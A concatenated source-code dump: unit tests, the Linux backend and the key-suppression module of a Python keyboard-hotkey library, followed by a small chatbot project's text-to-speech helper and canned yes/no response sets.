self.assertTrue(keyboard.matches(FakeEvent(KEY_DOWN, 'shift2'), 'shift'))
def test_listener(self):
empty_event = FakeEvent(KEY_DOWN, 'space')
empty_event.scan_code = None
keyboard._os_keyboard.queue.put(empty_event)
self.assertEqual(self.flush_events(), [])
def test_canonicalize(self):
space_scan_code = [[scan_codes_by_name['space']]]
space_name = [['space']]
self.assertEqual(keyboard.canonicalize(space_scan_code), space_scan_code)
self.assertEqual(keyboard.canonicalize(space_name), space_name)
self.assertEqual(keyboard.canonicalize(scan_codes_by_name['space']), space_scan_code)
self.assertEqual(keyboard.canonicalize('space'), space_name)
self.assertEqual(keyboard.canonicalize(' '), space_name)
self.assertEqual(keyboard.canonicalize('spacebar'), space_name)
self.assertEqual(keyboard.canonicalize('Space'), space_name)
self.assertEqual(keyboard.canonicalize('SPACE'), space_name)
with self.assertRaises(ValueError):
keyboard.canonicalize(['space'])
with self.assertRaises(ValueError):
keyboard.canonicalize(keyboard)
self.assertEqual(keyboard.canonicalize('_'), [['_']])
self.assertEqual(keyboard.canonicalize('space_bar'), space_name)
def test_is_pressed(self):
self.assertFalse(keyboard.is_pressed('enter'))
self.assertFalse(keyboard.is_pressed(scan_codes_by_name['enter']))
self.press('enter')
self.assertTrue(keyboard.is_pressed('enter'))
self.assertTrue(keyboard.is_pressed(scan_codes_by_name['enter']))
self.release('enter')
self.release('enter')
self.assertFalse(keyboard.is_pressed('enter'))
self.click('enter')
self.assertFalse(keyboard.is_pressed('enter'))
self.press('enter')
self.assertFalse(keyboard.is_pressed('ctrl+enter'))
self.press('ctrl')
self.assertTrue(keyboard.is_pressed('ctrl+enter'))
self.press('space')
self.assertTrue(keyboard.is_pressed('space'))
with self.assertRaises(ValueError):
self.assertFalse(keyboard.is_pressed('invalid key'))
with self.assertRaises(ValueError):
keyboard.is_pressed('space, space')
def test_is_pressed_duplicated_key(self):
self.assertFalse(keyboard.is_pressed(100))
self.assertFalse(keyboard.is_pressed(101))
self.assertFalse(keyboard.is_pressed('ctrl'))
self.press('ctrl', 100)
self.assertTrue(keyboard.is_pressed(100))
self.assertFalse(keyboard.is_pressed(101))
self.assertTrue(keyboard.is_pressed('ctrl'))
self.release('ctrl', 100)
self.press('ctrl', 101)
self.assertFalse(keyboard.is_pressed(100))
self.assertTrue(keyboard.is_pressed(101))
self.assertTrue(keyboard.is_pressed('ctrl'))
self.release('ctrl', 101)
def triggers(self, combination, keys):
self.triggered = False
def on_triggered():
self.triggered = True
keyboard.add_hotkey(combination, on_triggered)
for group in keys:
for key in group:
self.assertFalse(self.triggered)
self.press(key)
for key in reversed(group):
self.release(key)
keyboard.remove_hotkey(combination)
self.wait_for_events_queue()
return self.triggered
def test_hook(self):
self.i = 0
def count(e):
self.assertEqual(e.name, 'a')
self.i += 1
keyboard.hook(count)
self.click('a')
self.assertEqual(self.i, 2)
keyboard.hook(count)
self.click('a')
self.assertEqual(self.i, 6)
keyboard.unhook(count)
self.click('a')
self.assertEqual(self.i, 8)
keyboard.unhook(count)
self.click('a')
self.assertEqual(self.i, 8)
def test_hook_key(self):
self.i = 0
def count():
self.i += 1
keyboard.hook_key('a', keyup_callback=count)
self.press('a')
self.assertEqual(self.i, 0)
self.release('a')
self.click('b')
self.assertEqual(self.i, 1)
keyboard.hook_key('b', keydown_callback=count)
self.press('b')
self.assertEqual(self.i, 2)
keyboard.unhook_key('a')
keyboard.unhook_key('b')
self.click('a')
self.assertEqual(self.i, 2)
def test_register_hotkey(self):
self.assertFalse(self.triggers('a', [['b']]))
self.assertTrue(self.triggers('a', [['a']]))
self.assertTrue(self.triggers('a, b', [['a'], ['b']]))
self.assertFalse(self.triggers('b, a', [['a'], ['b']]))
self.assertTrue(self.triggers('a+b', [['a', 'b']]))
self.assertTrue(self.triggers('ctrl+a, b', [['ctrl', 'a'], ['b']]))
self.assertFalse(self.triggers('ctrl+a, b', [['ctrl'], ['a'], ['b']]))
self.assertTrue(self.triggers('ctrl+a, b', [['a', 'ctrl'], ['b']]))
self.assertTrue(self.triggers('ctrl+a, b, a', [['ctrl', 'a'], ['b'], ['ctrl', 'a'], ['b'], ['a']]))
def test_remove_hotkey(self):
keyboard.press('a')
keyboard.add_hotkey('a', self.fail)
keyboard.clear_all_hotkeys()
keyboard.press('a')
keyboard.add_hotkey('a', self.fail)
keyboard.clear_all_hotkeys()
keyboard.press('a')
keyboard.clear_all_hotkeys()
keyboard.add_hotkey('a', self.fail)
with self.assertRaises(ValueError):
keyboard.remove_hotkey('b')
keyboard.remove_hotkey('a')
def test_write(self):
keyboard.write('a')
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'a'), (KEY_UP, 'a')])
keyboard.write('ab')
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'a'), (KEY_UP, 'a'), (KEY_DOWN, 'b'), (KEY_UP, 'b')])
keyboard.write('Ab')
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'shift'), (KEY_DOWN, 'a'), (KEY_UP, 'a'), (KEY_UP, 'shift'), (KEY_DOWN, 'b'), (KEY_UP, 'b')])
keyboard.write('\n')
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'enter'), (KEY_UP, 'enter')])
def test_send(self):
keyboard.send('shift', True, False)
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'shift')])
keyboard.send('a')
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'a'), (KEY_UP, 'a')])
keyboard.send('a, b')
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'a'), (KEY_UP, 'a'), (KEY_DOWN, 'b'), (KEY_UP, 'b')])
keyboard.send('shift+a, b')
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'shift'), (KEY_DOWN, 'a'), (KEY_UP, 'a'), (KEY_UP, 'shift'), (KEY_DOWN, 'b'), (KEY_UP, 'b')])
self.press('a')
keyboard.write('a', restore_state_after=False, delay=0.001)
# TODO: two KEY_UP 'a' because the tests are not clearing the pressed
# keys correctly, it's not a bug in the keyboard module itself.
self.assertEqual(self.flush_events(), [(KEY_UP, 'a'), (KEY_UP, 'a'), (KEY_DOWN, 'a'), (KEY_UP, 'a')])
shift_scan_code = scan_codes_by_name['shift']
keyboard.send(shift_scan_code, True, False)
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'shift')])
keyboard.send([[shift_scan_code]], True, False)
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'shift')])
keyboard.send([['shift']], True, False)
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'shift')])
def test_type_unicode(self):
keyboard.write(u'û')
events = self.flush_events()
self.assertEqual(len(events), 1)
self.assertEqual(events[0].event_type, 'unicode')
self.assertEqual(events[0].name, u'û')
def test_press_release(self):
keyboard.press('a')
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'a')])
keyboard.release('a')
self.assertEqual(self.flush_events(), [(KEY_UP, 'a')])
keyboard.press('shift+a')
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'shift'), (KEY_DOWN, 'a')])
keyboard.release('shift+a')
self.assertEqual(self.flush_events(), [(KEY_UP, 'a'), (KEY_UP, 'shift')])
keyboard.press_and_release('a')
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'a'), (KEY_UP, 'a')])
def test_wait(self):
# If this fails it blocks. Unfortunately, but I see no other way of testing.
from threading import Thread, Lock
lock = Lock()
lock.acquire()
def t():
keyboard.wait('a')
lock.release()
Thread(target=t).start()
self.click('a')
lock.acquire()
def test_record_play(self):
from threading import Thread, Lock
lock = Lock()
lock.acquire()
self.recorded = None
def t():
self.recorded = keyboard.record('esc')
lock.release()
Thread(target=t).start()
self.click('a')
self.press('shift')
self.press('b')
self.release('b')
self.release('shift')
self.press('esc')
lock.acquire()
expected = [(KEY_DOWN, 'a'), (KEY_UP, 'a'), (KEY_DOWN, 'shift'), (KEY_DOWN, 'b'), (KEY_UP, 'b'), (KEY_UP, 'shift'), (KEY_DOWN, 'esc')]
for event_recorded, expected_pair in zip(self.recorded, expected):
expected_type, expected_name = expected_pair
self.assertEqual(event_recorded.event_type, expected_type)
self.assertEqual(event_recorded.name, expected_name)
keyboard._pressed_events.clear()
keyboard.play(self.recorded, speed_factor=0)
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'a'), (KEY_UP, 'a'), (KEY_DOWN, 'shift'), (KEY_DOWN, 'b'), (KEY_UP, 'b'), (KEY_UP, 'shift'), (KEY_DOWN, 'esc')])
keyboard.play(self.recorded, speed_factor=100)
self.assertEqual(self.flush_events(), [(KEY_DOWN, 'a'), (KEY_UP, 'a'), (KEY_DOWN, 'shift'), (KEY_DOWN, 'b'), (KEY_UP, 'b'), (KEY_UP, 'shift'), (KEY_DOWN, 'esc')])
# Should be ignored and not throw an error.
keyboard.play([FakeEvent('fake type', 'a')])
def test_word_listener_normal(self):
keyboard.add_word_listener('bird', self.fail)
self.click('b')
self.click('i')
self.click('r')
self.click('d')
self.click('s')
self.click('space')
with self.assertRaises(ValueError):
keyboard.add_word_listener('bird', self.fail)
keyboard.remove_word_listener('bird')
self.triggered = False
def on_triggered():
self.triggered = True
keyboard.add_word_listener('bird', on_triggered)
self.click('b')
self.click('i')
self.click('r')
self.click('d')
self.assertFalse(self.triggered)
self.click('space')
self.assertTrue(self.triggered)
keyboard.remove_word_listener('bird')
self.triggered = False
def on_triggered():
self.triggered = True
# Word listener should be case sensitive.
keyboard.add_word_listener('Bird', on_triggered)
self.click('b')
self.click('i')
self.click('r')
self.click('d')
self.assertFalse(self.triggered)
self.click('space')
self.assertFalse(self.triggered)
self.press('shift')
self.click('b')
self.release('shift')
self.click('i')
self.click('r')
self.click('d')
self.click('space')
self.assertTrue(self.triggered)
keyboard.remove_word_listener('Bird')
def test_word_listener_edge_cases(self):
self.triggered = False
def on_triggered():
self.triggered = True
handler = keyboard.add_word_listener('bird', on_triggered, triggers=['enter'])
self.click('b')
self.click('i')
self.click('r')
self.click('d')
self.click('space')
# We overwrote the triggers to remove space. Should not trigger.
self.assertFalse(self.triggered)
self.click('b')
self.click('i')
self.click('r')
self.click('d')
self.assertFalse(self.triggered)
self.click('enter')
self.assertTrue(self.triggered)
with self.assertRaises(ValueError):
# Must pass handler returned by function, not passed callback.
keyboard.remove_word_listener(on_triggered)
with self.assertRaises(ValueError):
keyboard.remove_word_listener('birb')
keyboard.remove_word_listener(handler)
self.triggered = False
# Timeout of 0 should mean "no timeout".
keyboard.add_word_listener('bird', on_triggered, timeout=0)
self.click('b')
self.click('i')
self.click('r')
self.click('d')
self.assertFalse(self.triggered)
self.click('space')
self.assertTrue(self.triggered)
keyboard.remove_word_listener('bird')
self.triggered = False
keyboard.add_word_listener('bird', on_triggered, timeout=0.01)
self.click('b')
self.click('i')
self.click('r')
time.sleep(0.03)
self.click('d')
self.assertFalse(self.triggered)
self.click('space')
# Should have timed out.
self.assertFalse(self.triggered)
keyboard.remove_word_listener('bird')
def test_abbreviation(self):
keyboard.add_abbreviation('tm', 'a')
self.press('shift')
self.click('t')
self.release('shift')
self.click('space')
self.assertEqual(self.flush_events(), []) # abbreviations should be case sensitive
self.click('t')
self.click('m')
self.click('space')
self.assertEqual(self.flush_events(), [
(KEY_UP, 'space'),
(KEY_DOWN, 'backspace'),
(KEY_UP, 'backspace'),
(KEY_DOWN, 'backspace'),
(KEY_UP, 'backspace'),
(KEY_DOWN, 'backspace'),
(KEY_UP, 'backspace'),
(KEY_DOWN, 'a'),
(KEY_UP, 'a')])
keyboard.add_abbreviation('TM', 'A')
self.press('shift')
self.click('t')
self.release('shift')
self.click('m')
self.click('space')
self.assertEqual(self.flush_events(), [])
self.press('shift')
self.click('t')
self.click('m')
self.release('shift')
self.click('space')
self.assertEqual(self.flush_events(), [
(KEY_UP, 'space'),
(KEY_DOWN, 'backspace'),
(KEY_UP, 'backspace'),
(KEY_DOWN, 'backspace'),
(KEY_UP, 'backspace'),
(KEY_DOWN, 'backspace'),
(KEY_UP, 'backspace'),
(KEY_DOWN, 'shift'),
(KEY_DOWN, 'a'),
(KEY_UP, 'a'),
(KEY_UP, 'shift'),])
def test_stash_restore_state(self):
self.press('a')
self.press('b')
state = keyboard.stash_state()
self.assertEqual(sorted(self.flush_events()), [(KEY_UP, 'a'), (KEY_UP, 'b')])
keyboard._pressed_events.clear()
assert len(state) == 2
self.press('c')
keyboard.restore_state(state)
self.assertEqual(sorted(self.flush_events()), [(KEY_DOWN, 'a'), (KEY_DOWN, 'b'), (KEY_UP, 'c')])
def test_get_typed_strings(self):
keyboard.hook(self.events.append)
self.click('b')
self.click('i')
self.press('shift')
self.click('r')
self.click('caps lock')
self.click('d')
self.click('caps lock')
self.release('shift')
self.click(' ')
self.click('backspace')
self.click('.')
self.click('enter')
self.click('n')
self.click('e')
self.click('w')
self.assertEqual(list(keyboard.get_typed_strings(self.events)), ['biRd.', 'new'])
def test_on_press(self):
keyboard.on_press(lambda e: self.assertEqual(e.name, 'a') and self.assertEqual(e.event_type, KEY_DOWN))
self.release('a')
self.press('a')
def test_on_release(self):
keyboard.on_release(lambda e: self.assertEqual(e.name, 'a') and self.assertEqual(e.event_type, KEY_UP))
self.press('a')
self.release('a')
def test_call_later(self):
self.triggered = False
def trigger(): self.triggered = True
keyboard.call_later(trigger, delay=0.1)
self.assertFalse(self.triggered)
time.sleep(0.2)
self.assertTrue(self.triggered)
def test_suppression(self):
def dummy():
pass
keyboard.add_hotkey('a+b+c', dummy, suppress=True)
keyboard.add_hotkey('a+g+h', dummy, suppress=True, timeout=0.01)
for key in ['a', 'b', 'c']:
assert not self.press(key)
for key in ['a', 'b', 'c']:
assert not self.release(key)
assert self.click('d')
for key in ['a', 'b']:
assert not self.press(key)
for key in ['a', 'b']:
assert not self.release(key)
assert self.click('c')
for key in ['a', 'g']:
assert not self.press(key)
for key in ['a', 'g']:
assert not self.release(key)
time.sleep(0.03)
assert self.click('h')
keyboard.remove_hotkey('a+g+h')
keyboard.remove_hotkey('a+b+c')
assert self.click('a')
if __name__ == '__main__':
unittest.main()
```
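The tests above work by swapping `keyboard._os_keyboard` for `FakeOsKeyboard` and feeding `FakeEvent`s straight into the listener queue. A stripped-down sketch of that seam, with hypothetical `FakeOs`/`Listener` names, shows why it makes the tests deterministic:
```python
import queue

class FakeOs:
    """Stand-in for the OS layer: it just remembers the queue it is handed."""
    def listen(self, q, is_allowed):
        self.queue = q  # tests push fake events here directly

class Listener:
    def __init__(self, os_keyboard):
        self.queue = queue.Queue()
        os_keyboard.listen(self.queue, is_allowed=lambda *a: True)

    def drain(self):
        events = []
        while not self.queue.empty():
            events.append(self.queue.get())
            self.queue.task_done()
        return events

fake = FakeOs()
listener = Listener(fake)
fake.queue.put(('down', 'a'))  # no real keypress involved
assert listener.drain() == [('down', 'a')]
```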
#### File: Symbolic-Math-Hotkeys/keyboard/_nixkeyboard.py
```python
import struct
import traceback
from time import time as now
from collections import namedtuple
from ._keyboard_event import KeyboardEvent, KEY_DOWN, KEY_UP, normalize_name
from ._nixcommon import EV_KEY, aggregate_devices, ensure_root
from ._suppress import KeyTable
# TODO: start by reading the current keyboard state, so as not to miss any already pressed keys.
# See: http://stackoverflow.com/questions/3649874/how-to-get-keyboard-state-in-linux
def cleanup_key(name):
""" Formats a dumpkeys format to our standard. """
name = name.lstrip('+')
is_keypad = name.startswith('KP_')
for mod in ('Meta_', 'Control_', 'dead_', 'KP_'):
if name.startswith(mod):
name = name[len(mod):]
# Dumpkeys is weird like that.
if name == 'Remove':
name = 'Delete'
elif name == 'Delete':
name = 'Backspace'
return normalize_name(name), is_keypad
def cleanup_modifier(modifier):
expected = ('alt', 'ctrl', 'shift', 'alt gr')
modifier = normalize_name(modifier)
if modifier in expected:
return modifier
if modifier[:-1] in expected:
return modifier[:-1]
raise ValueError('Unknown modifier {}'.format(modifier))
"""
Use `dumpkeys --keys-only` to list all scan codes and their names. We
then parse the output and built a table. For each scan code and modifiers we
have a list of names and vice-versa.
"""
from subprocess import check_output
import re
to_name = {}
from_name = {}
keypad_scan_codes = set()
def register_key(key_and_modifiers, name):
to_name[key_and_modifiers] = name
from_name[name] = key_and_modifiers
def build_tables():
if to_name and from_name: return
ensure_root()
keycode_template = r'^(.*?)keycode\s+(\d+)\s+=(.*?)$'
dump = check_output(['dumpkeys', '--keys-only'], universal_newlines=True)
for str_modifiers, str_scan_code, str_names in re.findall(keycode_template, dump, re.MULTILINE):
if not str_names: continue
modifiers = tuple(sorted(set(cleanup_modifier(m) for m in str_modifiers.strip().split())))
scan_code = int(str_scan_code)
name, is_keypad = cleanup_key(str_names.strip().split()[0])
to_name[(scan_code, modifiers)] = name
if is_keypad:
keypad_scan_codes.add(scan_code)
from_name['keypad ' + name] = (scan_code, ())
if name not in from_name or len(modifiers) < len(from_name[name][1]):
from_name[name] = (scan_code, modifiers)
# Assume Shift uppercases keys that are single characters.
# Hackish, but a good heuristic so far.
for name, (scan_code, modifiers) in list(from_name.items()):
upper = name.upper()
if len(name) == 1 and upper not in from_name:
register_key((scan_code, modifiers + ('shift',)), upper)
    # dumpkeys consistently misreports the Windows key, sometimes
    # skipping it completely or reporting it as 'alt'. 125 = left win,
    # 126 = right win.
if (125, ()) not in to_name or to_name[(125, ())] == 'alt':
register_key((125, ()), 'windows')
if (126, ()) not in to_name or to_name[(126, ())] == 'alt':
register_key((126, ()), 'windows')
# The menu key is usually skipped altogether, so we also add it manually.
if (127, ()) not in to_name:
register_key((127, ()), 'menu')
synonyms_template = r'^(\S+)\s+for (.+)$'
dump = check_output(['dumpkeys', '--long-info'], universal_newlines=True)
for synonym_str, original_str in re.findall(synonyms_template, dump, re.MULTILINE):
synonym, _ = cleanup_key(synonym_str)
original, _ = cleanup_key(original_str)
try:
from_name[synonym] = from_name[original]
except KeyError:
# Dumpkeys reported a synonym to an unknown key.
pass
device = None
def build_device():
global device
if device: return
ensure_root()
device = aggregate_devices('kbd')
def init():
build_device()
build_tables()
pressed_modifiers = set()
def listen(queue, is_allowed=lambda *args: True):
build_device()
build_tables()
while True:
time, type, code, value, device_id = device.read_event()
if type != EV_KEY:
continue
scan_code = code
event_type = KEY_DOWN if value else KEY_UP # 0 = UP, 1 = DOWN, 2 = HOLD
try:
name = to_name[(scan_code, tuple(sorted(pressed_modifiers)))]
except KeyError:
name = to_name.get((scan_code, ()), 'unknown')
if name in ('alt', 'alt gr', 'ctrl', 'shift'):
if event_type == KEY_DOWN:
pressed_modifiers.add(name)
else:
pressed_modifiers.discard(name)
is_keypad = scan_code in keypad_scan_codes
queue.put(KeyboardEvent(event_type=event_type, scan_code=scan_code, name=name, time=time, device=device_id, is_keypad=is_keypad))
def write_event(scan_code, is_down):
build_device()
device.write_event(EV_KEY, scan_code, int(is_down))
def map_char(name):
build_tables()
if name in from_name:
return from_name[name]
parts = name.split(' ', 1)
if (name.startswith('left ') or name.startswith('right ')) and parts[1] in from_name:
return from_name[parts[1]]
else:
raise ValueError('Name {} is not mapped to any known key.'.format(repr(name)))
def press(scan_code):
write_event(scan_code, True)
def release(scan_code):
write_event(scan_code, False)
def type_unicode(character):
codepoint = ord(character)
hexadecimal = hex(codepoint)[len('0x'):]
for key in ['ctrl', 'shift', 'u']:
scan_code, _ = map_char(key)
press(scan_code)
for key in hexadecimal:
scan_code, _ = map_char(key)
press(scan_code)
release(scan_code)
for key in ['ctrl', 'shift', 'u']:
scan_code, _ = map_char(key)
release(scan_code)
if __name__ == '__main__':
def p(e):
print(e)
listen(p)
```
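`build_tables` drives everything off two regexes over `dumpkeys` output. A small demonstration of the keycode regex on a hand-written sample (the sample lines are illustrative, not captured output):
```python
import re

keycode_template = r'^(.*?)keycode\s+(\d+)\s+=(.*?)$'  # same pattern as above
dump = "shift keycode  16 = Q\nkeycode  57 = space\n"
for str_modifiers, str_scan_code, str_names in re.findall(
        keycode_template, dump, re.MULTILINE):
    modifiers = tuple(sorted(set(str_modifiers.strip().split())))
    print(modifiers, int(str_scan_code), str_names.strip().split()[0])
# -> ('shift',) 16 Q
#    () 57 space
```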
#### File: Symbolic-Math-Hotkeys/keyboard/_suppress.py
```python
from threading import Lock, Thread
from timeit import default_timer as timer
from keyboard._keyboard_event import normalize_name
import re
class KeyTable(object):
_keys = {}
_write = Lock() # Required to edit keys
_table = {}
_time = -1
_elapsed = 0 # Maximum time that has elapsed so far in the sequence
_read = Lock() # Required to edit table
_in_sequence = False
_keys_suppressed = [] # List of keys that have been suppressed so far in the sequence
_disable = False # Disables key suppression during replay to avoid infinite loop
    SEQUENCE_END = 2  # Delimiter that signifies the end of the sequence
def __init__(self, press_key, release_key):
self.press_key = press_key
self.release_key = release_key
def is_allowed(self, key, is_up, advance=True):
"""
The goal of this function is to be very fast. This is accomplished
through the table structure, which ensures that we only need to
check whether `key is in self._table` and change what variable
is referenced by `self._table`.
Unfortunately, handling timeouts properly has added significantly to
the logic required, but the function should still be well within required
time limits.
"""
if self._disable:
return True
if key != self.SEQUENCE_END:
key = re.sub('(left|right) ', '', key)
time = timer()
if self._time == -1:
elapsed = 0
else:
elapsed = time - self._time
if self._elapsed > elapsed:
elapsed = self._elapsed
if is_up:
if self._in_sequence:
if key != self.SEQUENCE_END:
self._keys_suppressed.append((key, is_up))
return False
else:
advance = False
in_sequence = key in self._table and elapsed < self._table[key][0]
in_keys = key in self._keys
suppress = in_sequence or in_keys
if advance:
self._read.acquire()
if in_sequence and self._table[key][2]:
del self._keys_suppressed[:]
if in_sequence and self._table[key][1]:
self._table = self._table[key][1]
if self._time != -1:
self._elapsed = elapsed
self._time = -1
elif in_keys and self._keys[key][1]:
self._table = self._keys[key][1]
if self._time != -1:
self._elapsed = elapsed
self._time = -1
self._replay_keys()
del self._keys_suppressed[:]
else:
self._table = self._keys
self._time = -1
self._elapsed = -1
self._replay_keys()
del self._keys_suppressed[:]
self._in_sequence = in_sequence
self._read.release()
if key != self.SEQUENCE_END and suppress:
self._keys_suppressed.append((key, is_up))
return not suppress
def complete_sequence(self):
if self.SEQUENCE_END in self._table:
self.is_allowed(self.SEQUENCE_END, False)
self._read.acquire()
self._time = timer()
self._read.release()
else:
self._read.acquire()
self._time = -1
self._elapsed = 0
self._table = self._keys
self._replay_keys()
del self._keys_suppressed[:]
self._read.release()
def _replay_keys(self):
self._disable = True
for key, is_up in self._keys_suppressed:
if is_up:
self.release_key(key)
else:
self.press_key(key)
self._disable = False
def _refresh(self):
self._read.acquire()
self._disable = False
self._table = self._keys
self._read.release()
    def _acquire_table(self, sequence, table, timeout):
        """
        Walks down the nested table, creating levels as needed, and returns
        the flat (single level) dictionary that contains the final element.
        :param sequence: remaining keys of the sequence
        :param table: current level of the nested suppression table
        :return: the dictionary containing the last element of the sequence
        """
        el = sequence.pop(0)
        if el not in table:
            table[el] = (timeout, {}, False)
        if table[el][0] < timeout:
            # Entries are tuples (immutable), so rebuild instead of assigning in place.
            table[el] = (timeout, table[el][1], table[el][2])
if sequence:
return self._acquire_table(sequence, table[el][1], timeout)
else:
return table
def suppress_sequence(self, sequence, timeout):
"""
Adds keys to the suppress_keys table
:param sequence: List of scan codes
:param timeout: Time allowed to elapse before resetting
"""
# the suppress_keys table is organized
# as a dict of dicts so that the critical
# path is only checking whether the
# scan code is 'in current_dict'
flat = []
for subsequence in sequence:
flat.extend(subsequence)
flat.append(self.SEQUENCE_END)
last_index = flat[-1]
self._write.acquire()
table = self._acquire_table(flat, self._keys, timeout)
table[last_index] = (table[last_index][0], table[last_index][1], True)
self._refresh()
self._write.release()
def suppress_none(self):
"""
Clears the suppress_keys table and disables
key suppression
:return:
"""
self._write.acquire()
self._keys = {}
self._refresh()
self._write.release()
self._read.acquire()
self._disable = True
self._read.release()
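# Illustrative shape of the nested suppression table (an assumed example, not
# taken from the source): after suppress_sequence([['ctrl', 'a']], timeout=1.0)
# the _keys table is roughly
#   {'ctrl': (1.0, {'a': (1.0, {KeyTable.SEQUENCE_END: (1.0, {}, True)}, False)}, False)}
# so the hot path in is_allowed only ever tests `key in self._table`.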
``` |
{
"source": "3NiGMa404/Omnipotent",
"score": 2
} |
#### File: 3NiGMa404/Omnipotent/routput.py
```python
import pyttsx3
# initialisation
engine = pyttsx3.init()
def ret(text):
engine.say(text)
engine.runAndWait()
```
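A usage sketch for the helper above (assuming `routput.py` is importable from the working directory):
```python
from routput import ret

ret('initialisation complete')  # blocks until the phrase has been spoken
```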
#### File: 3NiGMa404/Omnipotent/sets.py
```python
positives = ['yes', 'yep', 'for sure', 'affirmative', 'definitely']
negatives = ['no', 'nope', 'nah', 'nae']
class yesnoset:
def __init__(self, responses, beginnings, tag, savenoun=False):
self.beginnings = beginnings
self.responses = responses
self.tag = tag
self.savenoun = savenoun
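# Each yesnoset pairs trigger 'beginnings' with candidate 'responses' and a
# routing tag; savenoun=True (used by the noun sets below) presumably keeps
# the sentence's subject so the reply can refer back to it.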
do_you_p = yesnoset(['i do', 'yeah, i do'] +
positives, ["do you "], "!do_you_p!")
do_you_n = yesnoset(["nah, i dont", 'i do not'] +
negatives, ["do you "], "!do_you_n!")
do_i_p = yesnoset(['you do', 'i think you do'] +
positives, ["do i "], "!do_i_p!")
dont_i_p = yesnoset(['you do', 'i think you do'] +
                    positives, ["dont i ", "dont i "], "!dont_i_p!")
dont_i_n = yesnoset(["you dont", "i dont think you do"] +
                    negatives, ["dont i ", "dont i "], "!dont_i_n!")
dont_u_p = yesnoset(['i do', 'i think i do'] + positives,
["dont you ,dont you "], "!dont_u_p!")
dont_u_n = yesnoset(["i dont", 'i do not', "i dont think i do"] +
negatives, ["dont you ,dont you "], "!dont_u_n!")
do_i_n = yesnoset(["you dont", "i dont think you do"] +
negatives, ["do i "], "!do_i_n!")
things_i_can_do = ['talk', 'read', 'speak', 'understand me', 'understand']
can_i_p = yesnoset(['you can!',
'yes, you can',
'i think you can'] + positives,
['can i '],
"!can_i_p!")
can_i_n = yesnoset(["you cant",
"nah, you cant",
"i dont think you can"] + negatives,
['can i '],
"!can_i_n!")
can_u_p = yesnoset(['yes, i can', 'i can', 'i think i can'] +
positives, ['can you '], "!can_u_p!")
can_u_n = yesnoset(["no i cant",
'i can not',
"i dont think i can"] + negatives,
['can you '],
"!can_u_n!")
will_i_p = yesnoset(['yes you will',
'you will',
'i think you will'] + positives,
['will i '],
"!will_i_p!")
will_i_n = yesnoset(["i dont think you will",
'no you will not',
'you will not'] + negatives,
['will i '],
"!will_i_n!")
will_u_p = yesnoset(['yes i will', 'i will', 'i think i will'] +
positives, ['will you '], "!will_u_p!")
will_u_n = yesnoset(["i dont think i will",
'no i will not',
'i will not',
"i wont"] + negatives,
['will you '],
"!will_u_n!")
wont_i_p = yesnoset(['you will', 'i think you will'] +
positives, ["wont i ", "wont i "], "!wont_i_p!")
wont_i_n = yesnoset(["i dont think you will", "you wont"] +
negatives, ["wont i ", "wont i "], "!wont_i_n!")
wont_u_p = yesnoset(['i will', 'i think i will'] +
positives, ["wont you ", "wont you "], "!wont_u_p!")
wont_u_n = yesnoset(["i dont think i will", "i wont"] +
negatives, ["wont you ", "wont you "], "!wont_u_n!")
would_i_p = yesnoset(['you would',
'i think you would',
'yeah, you would'] + positives,
["would i "],
"!would_i_p!")
would_i_n = yesnoset(["you wouldnt",
"i dont think you would",
"nah, you wouldnt"] + negatives,
["would i "],
"!would_i_n!")
would_u_p = yesnoset(['i would',
'i think i would',
'yeah, i would'] + positives,
["would you "],
"!would_u_p!")
would_u_n = yesnoset(["i wouldnt",
"i dont think i would",
"nah, i wouldnt"] + negatives,
["would you "],
"!would_u_n!")
wouldnt_i_p = yesnoset(['you would', 'i think you would'] +
positives, ["wouldnt i ", "wouldnt i "], "!wouldnt_i_p!")
wouldnt_i_n = yesnoset(["you wouldnt",
"i dont think you would",
"nah, you wouldnt"] + negatives,
["wouldnt i ",
"wouldnt i "],
"!wouldnt_i_n!")
wouldnt_u_p = yesnoset(['i would', 'i think i would'] +
positives, ["wouldnt you ", "wouldnt you "], "!wouldnt_u_p!")
wouldnt_u_n = yesnoset(["i wouldnt",
"i dont think i would",
"i would not"] + negatives,
["wouldnt you ",
"wouldnt you "],
"!wouldnt_u_n!")
could_i_p = yesnoset(['you could',
'i think you could',
'yeah, you could'] + positives,
["could i "],
"!could_i_p!")
could_i_n = yesnoset(["you couldnt",
"i dont think you could",
"nah, you couldnt"] + negatives,
["could i "],
"!could_i_n!")
could_u_p = yesnoset(['i could',
'i think i could',
'yeah, i could'] + positives,
["could you "],
"!could_u_p!")
could_u_n = yesnoset(["i couldnt",
"i dont think i could",
"nah, i couldnt"] + negatives,
["could you "],
"!could_u_n!")
couldnt_i_p = yesnoset(['you could', 'i think you could'] +
positives, ["couldnt i ", "couldnt i "], "!couldnt_i_p!")
couldnt_i_n = yesnoset(["you couldnt",
"i dont think you could",
"nah, you couldnt"] + negatives,
["couldnt i ",
"couldnt i "],
"!couldnt_i_n!")
couldnt_u_p = yesnoset(['i could', 'i think i could'] +
positives, ["couldnt you ", "couldnt you "], "!couldnt_u_p!")
couldnt_u_n = yesnoset(["i couldnt",
"i dont think i could",
"i could not"] + negatives,
["couldnt you ",
"couldnt you "],
"!couldnt_u_n!")
should_i_p = yesnoset(['you should',
'i think you should',
'yeah, you should'] + positives,
["should i "],
"!should_i_p!")
should_i_n = yesnoset(["you shouldnt",
"i dont think you should",
"nah, you shouldnt"] + negatives,
["should i "],
"!should_i_n!")
should_u_p = yesnoset(['i should',
'i think i should',
'yeah, i should'] + positives,
["should you "],
"!should_u_p!")
should_u_n = yesnoset(["i shouldnt",
"i dont think i should",
"nah, i shouldnt"] + negatives,
["should you "],
"!should_u_n!")
shouldnt_i_p = yesnoset(['you should', 'i think you should'] +
positives, ["shouldnt i ", "shouldnt i "], "!shouldnt_i_p!")
shouldnt_i_n = yesnoset(["you shouldnt",
"i dont think you should",
"nah, you shouldnt"] + negatives,
